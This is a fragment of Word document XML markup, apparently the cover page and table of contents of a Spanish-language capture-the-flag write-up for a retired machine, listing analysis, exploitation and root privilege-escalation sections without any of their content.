                        </w:r>
                        <w:r w:rsidR="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> C</w:t>
                        </w:r>
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:rFonts w:ascii="Segoe UI" w:hAnsi="Segoe UI" w:cs="Segoe UI"/>
                            <w:sz w:val="28"/>
                            <w:szCs w:val="28"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>havarría</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r w:rsidR="00A91712" w:rsidRPr="00A91712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6E31E1D" w14:textId="3C069551" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00A91712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9171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1DF633" wp14:editId="78A7BD34">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2747087</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2411095</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1657815" cy="498831"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="5764261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815" cy="498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9F077" w14:textId="0BB0F1D3" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="0000000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hyperlink r:id="rId17" w:history="1">
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:sz w:val="40"/>
                                  <w:szCs w:val="40"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>hackemate.p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DF633" id="_x0000_s1034" type="#_x0000_t202" style="position:absolute;margin-left:216.3pt;margin-top:189.85pt;width:130.55pt;height:39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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="6639F077" w14:textId="0BB0F1D3" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:hyperlink r:id="rId18" w:history="1">
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:sz w:val="40"/>
                            <w:szCs w:val="40"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>hackemate.p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9171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606152" wp14:editId="6C7D997E">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2709359</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1725930</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1605776" cy="498831"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapNone/>
                <wp:docPr id="1444768941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776" cy="498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170BC" w14:textId="3D7BB5AA" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="0000000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hyperlink r:id="rId19" w:history="1">
                              <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                                <w:rPr>
                                  <w:rStyle w:val="Hipervnculo"/>
                                  <w:sz w:val="40"/>
                                  <w:szCs w:val="40"/>
                                  <w:u w:val="none"/>
                                </w:rPr>
                                <w:t>@HackeMate</w:t>
                              </w:r>
                            </w:hyperlink>
                            <w:r w:rsidR="00A91712" w:rsidRPr="00A9171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6152" id="_x0000_s1035" type="#_x0000_t202" style="position:absolute;margin-left:213.35pt;margin-top:135.9pt;width:126.45pt;height:39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" filled="f" stroked="f" strokeweight=".5pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="61E170BC" w14:textId="3D7BB5AA" w:rsidR="00A91712" w:rsidRPr="00A91712" w:rsidRDefault="00000000">
                      <w:pPr>
                        <w:rPr>
                          <w:sz w:val="40"/>
                          <w:szCs w:val="40"/>
                        </w:rPr>
                      </w:pPr>
                      <w:hyperlink r:id="rId20" w:history="1">
                        <w:r w:rsidR="00A91712" w:rsidRPr="00A91712">
                          <w:rPr>
                            <w:rStyle w:val="Hipervnculo"/>
                            <w:sz w:val="40"/>
                            <w:szCs w:val="40"/>
                            <w:u w:val="none"/>
                          </w:rPr>
                          <w:t>@HackeMate</w:t>
                        </w:r>
                      </w:hyperlink>
                      <w:r w:rsidR="00A91712" w:rsidRPr="00A91712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63D4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65DAEA" wp14:editId="7278AA17">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2104390</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3058795</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2874645" cy="480695"/>
                <wp:effectExtent l="247650" t="209550" r="268605" b="319405"/>
                <wp:wrapNone/>
                <wp:docPr id="324208194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645" cy="48069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266700" dist="508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01906C2A" w14:textId="6200F059" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr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17A9F" wp14:editId="0E9A1303">
                                  <wp:extent cx="341523" cy="341523"/>
                                  <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
                                  <wp:docPr id="2054033662" name="Imagen 2054033662" descr="Un dibujo de una cara feliz&#10;&#10;Descripción generada automáticamente con confianza b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1232251" name="Imagen 12" descr="Un dibujo de una cara feliz&#10;&#10;Descripción generada automáticamente con confianza b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703" cy="355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</w:p>
                          <w:p w14:paraId="1C922562" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr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5DAEA" id="Cuadro de texto 10" o:spid="_x0000_s1036" style="position:absolute;margin-left:165.7pt;margin-top:240.85pt;width:226.35pt;height:3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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:shadow on="t" color="black" offset="0,4pt"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="01906C2A" w14:textId="6200F059" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr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117A9F" wp14:editId="0E9A1303">
                            <wp:extent cx="341523" cy="341523"/>
                            <wp:effectExtent l="0" t="0" r="1905" b="1905"/>
                            <wp:docPr id="2054033662" name="Imagen 2054033662" descr="Un dibujo de una cara feliz&#10;&#10;Descripción generada automáticamente con confianza b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1232251" name="Imagen 12" descr="Un dibujo de una cara feliz&#10;&#10;Descripción generada automáticamente con confianza b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703" cy="355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</w:p>
                    <w:p w14:paraId="1C922562" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr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63D4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72F998" wp14:editId="5BE4C579">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2101174</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>3730949</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2874928" cy="481114"/>
                <wp:effectExtent l="247650" t="209550" r="268605" b="319405"/>
                <wp:wrapNone/>
                <wp:docPr id="704692754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928" cy="481114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266700" dist="508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31A333A2" w14:textId="18C972A1" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr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F3DAB" wp14:editId="2C2D7EEC">
                                  <wp:extent cx="354330" cy="354330"/>
                                  <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                                  <wp:docPr id="1154244774" name="Imagen 1154244774" descr="Facebook Logo - PNG y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Facebook Logo - PNG y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154" cy="371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</w:p>
                          <w:p w14:paraId="5D00A059" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr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2F998" id="_x0000_s1037" style="position:absolute;margin-left:165.45pt;margin-top:293.8pt;width:226.35pt;height:37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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:shadow on="t" color="black" offset="0,4pt"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="31A333A2" w14:textId="18C972A1" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr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3F3DAB" wp14:editId="2C2D7EEC">
                            <wp:extent cx="354330" cy="354330"/>
                            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                            <wp:docPr id="1154244774" name="Imagen 1154244774" descr="Facebook Logo - PNG y Vec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Facebook Logo - PNG y Vec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154" cy="371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</w:p>
                    <w:p w14:paraId="5D00A059" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr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63D4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9203DD" wp14:editId="385A91A4">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2121103</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2392220</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2874928" cy="481114"/>
                <wp:effectExtent l="247650" t="209550" r="268605" b="319405"/>
                <wp:wrapNone/>
                <wp:docPr id="68540719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928" cy="481114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266700" dist="508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3D5913A9" w14:textId="7A8E0BB2" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr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398FC" wp14:editId="25F0D5FD">
                                  <wp:extent cx="354887" cy="354330"/>
                                  <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                                  <wp:docPr id="892760281" name="Imagen 892760281" descr="Icon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2760281" name="Imagen 892760281" descr="Icono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6" cy="367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</w:p>
                          <w:p w14:paraId="1D5421E0" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr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203DD" id="_x0000_s1038" style="position:absolute;margin-left:167pt;margin-top:188.35pt;width:226.35pt;height:37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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:shadow on="t" color="black" offset="0,4pt"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="3D5913A9" w14:textId="7A8E0BB2" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr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6398FC" wp14:editId="25F0D5FD">
                            <wp:extent cx="354887" cy="354330"/>
                            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
                            <wp:docPr id="892760281" name="Imagen 892760281" descr="Icon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2760281" name="Imagen 892760281" descr="Icono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6" cy="367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</w:p>
                    <w:p w14:paraId="1D5421E0" w14:textId="77777777" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr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63D4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327933" wp14:editId="35BF0513">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2124724</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1720404</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="2874928" cy="481114"/>
                <wp:effectExtent l="247650" t="209550" r="268605" b="319405"/>
                <wp:wrapNone/>
                <wp:docPr id="73741655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928" cy="481114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266700" dist="508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017738E8" w14:textId="6BC75915" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr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D0B40" wp14:editId="4CBD5073">
                                  <wp:extent cx="466927" cy="322922"/>
                                  <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                                  <wp:docPr id="1232229529" name="Imagen 1232229529" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza medi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470123" cy="325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</w:p>
                          <w:p w14:paraId="39D865FA" w14:textId="33EAB9C9" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                            <w:pPr>
                              <w:rPr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27933" id="_x0000_s1039" style="position:absolute;margin-left:167.3pt;margin-top:135.45pt;width:226.35pt;height:37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" fillcolor="white [3201]" strokeweight=".5pt">
                <v:shadow on="t" color="black" offset="0,4pt"/>
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="017738E8" w14:textId="6BC75915" w:rsidR="00663D49" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr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CD0B40" wp14:editId="4CBD5073">
                            <wp:extent cx="466927" cy="322922"/>
                            <wp:effectExtent l="0" t="0" r="0" b="1270"/>
                            <wp:docPr id="1232229529" name="Imagen 1232229529" descr="Una señal de alto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4267720" name="Imagen 654267720" descr="Una señal de alto&#10;&#10;Descripción generada automáticamente con confianza media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470123" cy="325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</w:p>
                    <w:p w14:paraId="39D865FA" w14:textId="33EAB9C9" w:rsidR="00663D49" w:rsidRPr="0058283C" w:rsidRDefault="00663D49" w:rsidP="00663D49">
                      <w:pPr>
                        <w:rPr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7772">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251739136" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="2E4BF600" wp14:editId="046C01FD">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>-714375</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>1829435</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="2160270" cy="2183130"/>
            <wp:effectExtent l="342900" t="285750" r="297180" b="388620"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="70704878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48783" name="Imagen 70704878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183130"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:effectLst>
                      <a:outerShdw blurRad="304800" dist="50800" dir="6600000" sx="107000" sy="107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4E7" w:rsidRPr="00E53B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent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9FCB40A" wp14:editId="08594A31">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:posOffset>146050</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>266700</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1457325" cy="69405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A62EC" w14:textId="397644CC" w:rsidR="0046412D" w:rsidRPr="007A24E7" w:rsidRDefault="0046412D" w:rsidP="0046412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7D5522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  <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>OS</w:t>
                            </w:r>
                            <w:r w:rsidR="00440990" w:rsidRPr="007A24E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br/>
                            </w:r>
                            <w:r w:rsidRPr="007A24E7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B40A" id="_x0000_s1040" type="#_x0000_t202" style="position:absolute;margin-left:11.5pt;margin-top:21pt;width:114.75pt;height:54.6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" filled="f" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="5FCA62EC" w14:textId="397644CC" w:rsidR="0046412D" w:rsidRPr="007A24E7" w:rsidRDefault="0046412D" w:rsidP="0046412D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7D5522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  <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>OS</w:t>
                      </w:r>
                      <w:r w:rsidR="00440990" w:rsidRPr="007A24E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br/>
                      </w:r>
                      <w:r w:rsidRPr="007A24E7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Lin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24E7" w:rsidRPr="00E53B6E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:noProof/>
          <w:color w:val="70AD47" w:themeColor="accent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96884BD" wp14:editId="4CE572D1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1650365" cy="651510"/>
                <wp:effectExtent l="0" t="0" r="0" b="0"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="8182987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3F798" w14:textId="2C66546B" w:rsidR="00B20ED4" w:rsidRPr="007A24E7" w:rsidRDefault="007A24E7" w:rsidP="00B20ED4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7D5522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  <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t xml:space="preserve">INFORMACIÓN </w:t>
                            </w:r>
                            <w:r w:rsidRPr="007A24E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br/>
                            </w:r>
                            <w:r w:rsidRPr="007A24E7">
                              <w:rPr>
                                <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                <w:lang w:val="es-ES"/>
                              </w:rPr>
                              <w:t>MÁQUINA RETI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84BD" id="_x0000_s1041" type="#_x0000_t202" style="position:absolute;margin-left:78.75pt;margin-top:21.7pt;width:129.95pt;height:51.3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" filled="f" stroked="f" strokeweight="1pt">
                <v:textbox>
                  <w:txbxContent>
                    <w:p w14:paraId="29C3F798" w14:textId="2C66546B" w:rsidR="00B20ED4" w:rsidRPr="007A24E7" w:rsidRDefault="007A24E7" w:rsidP="00B20ED4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7D5522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  <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t xml:space="preserve">INFORMACIÓN </w:t>
                      </w:r>
                      <w:r w:rsidRPr="007A24E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br/>
                      </w:r>
                      <w:r w:rsidRPr="007A24E7">
                        <w:rPr>
                          <w:color w:val="FFFFFF" w:themeColor="background1"/>
                          <w:lang w:val="es-ES"/>
                        </w:rPr>
                        <w:t>MÁQUINA RETIRA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552">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="70AD47" w:themeColor="accent6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455099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F1A16" w14:textId="47942339" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="5FDF1FF1" w14:textId="0E3FF26E" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="65031912" w14:textId="7F4043BD" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="022FCC97" w14:textId="11A9083F" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6A8D1E6C" w14:textId="2390BCD5" w:rsidR="008B5FA3" w:rsidRPr="00CF4921" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:sz w:val="22"/>
              <w:szCs w:val="22"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="13D69097" w14:textId="6052E138" w:rsidR="008B5FA3" w:rsidRPr="00206A93" w:rsidRDefault="008B5FA3">
          <w:pPr>
            <w:pStyle w:val="TtuloTDC"/>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="50"/>
              <w:szCs w:val="50"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="00206A93">
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:sz w:val="50"/>
              <w:szCs w:val="50"/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:t>Contenido</w:t>
          </w:r>
        </w:p>
        <w:p w14:paraId="08247E06" w14:textId="77777777" w:rsidR="008B5FA3" w:rsidRPr="008B5FA3" w:rsidRDefault="008B5FA3" w:rsidP="008B5FA3">
          <w:pPr>
            <w:rPr>
              <w:sz w:val="2"/>
              <w:szCs w:val="2"/>
              <w:lang w:val="es-ES" w:eastAsia="es-PE"/>
            </w:rPr>
          </w:pPr>
        </w:p>
        <w:p w14:paraId="6D1C9F4D" w14:textId="2400205E" w:rsidR="008B5FA3" w:rsidRPr="008B5FA3" w:rsidRDefault="008B5FA3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03585" w:history="1">
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>1.</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Análisis</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc138803585 \h </w:instrText>
            </w:r>
            <w:r w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidRPr="008B5FA3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F4187">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>3</w:t>
            </w:r>
            <w:r w:rsidRPr="008B5FA3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E183485" w14:textId="658EE278" w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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138803586" w:history="1">
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>2.</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Explotación</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc138803586 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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F4187">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>7</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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1A3D3B9" w14:textId="65DD8E9C" w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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138803587" w:history="1">
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>3.</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:rStyle w:val="Hipervnculo"/>
                <w:noProof/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>Escalada de privilegios para ser root</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:tab/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:fldChar w:fldCharType="begin"/>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:instrText xml:space="preserve"> PAGEREF _Toc138803587 \h </w:instrText>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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F4187">
              <w:rPr>
                <w:noProof/>
                <w:webHidden/>
                <w:sz w:val="40"/>
                <w:szCs w:val="40"/>
              </w:rPr>
              <w:t>12</w:t>
            </w:r>
            <w:r w:rsidR="008B5FA3" w:rsidRPr="008B5FA3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975A109" w14:textId="4F48FC48" w:rsidR="008B5FA3" w:rsidRDefault="008B5FA3">
          <w:r>
            <w:rPr>
              <w:b/>
              <w:bCs/>
              <w:lang w:val="es-ES"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:p>
      </w:sdtContent>
    </w:sdt>
    <w:p w14:paraId="34F567C1" w14:textId="6A556F46" w:rsidR="0051639D" w:rsidRDefault="00CF4921" w:rsidP="00AB7425">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251657214" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="30DEDC94" wp14:editId="6A9AB5F5">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>2611755</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-243840</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3628390" cy="3756119"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="14682324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3245" name="Imagen 146823245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000" b="90000" l="10000" r="90000">
                                  <a14:foregroundMark x1="20775" y1="67728" x2="20775" y2="67728"/>
                                  <a14:foregroundMark x1="21473" y1="66071" x2="23798" y2="62713"/>
                                  <a14:foregroundMark x1="53488" y1="22503" x2="53488" y2="22503"/>
                                  <a14:foregroundMark x1="53488" y1="20061" x2="56202" y2="313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2" b="26093"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3628390" cy="375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39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FD22A5" wp14:editId="0926DE46">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="page">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>9074150</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="7543800" cy="704850"/>
                <wp:effectExtent l="0" t="0" r="19050" b="19050"/>
                <wp:wrapNone/>
                <wp:docPr id="187692878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04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FB606" w14:textId="586BD937" w:rsidR="0051639D" w:rsidRPr="00A56118" w:rsidRDefault="007A24E7" w:rsidP="007A24E7">
                            <w:pPr>
                              <w:jc w:val="center"/>
                              <w:rPr>
                                <w:rFonts w:ascii="Selawik Semibold" w:hAnsi="Selawik Semibold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Selawik Semibold" w:hAnsi="Selawik Semibold"/>
                                <w:sz w:val="36"/>
                                <w:szCs w:val="36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C76FF6" wp14:editId="501F361D">
                                  <wp:extent cx="270934" cy="187375"/>
